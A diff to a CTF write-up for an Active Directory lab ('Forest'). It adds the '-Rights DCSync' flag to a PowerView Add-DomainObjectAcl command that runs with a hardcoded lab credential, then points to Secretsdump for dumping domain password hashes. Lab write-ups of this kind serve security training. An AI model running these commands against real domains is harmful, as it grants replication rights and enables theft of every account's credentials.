dankalish/CTF/ActiveDirectory/Lab-Forest/forest-writeup.md

 Import-Module .\PowerView.ps1
 ```

 Then follow the instructions from Bloodhound.
-Add the PrincipalIdentity flag and include the identity in the expanded format.
+Add the PrincipalIdentity flag and include the full length naming context for the TargetIdentity Add-DomainObjectsAcl command.

 ```
 $SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

 $Cred = New-Object System.Management.Automation.PSCredential('HTB\bob', $SecPassword)

-Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity bob
+Add-DomainObjectAcl -Credential $Cred -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity bob -Rights DCSync
 ```

 Then use Secretsdump to get the Password dump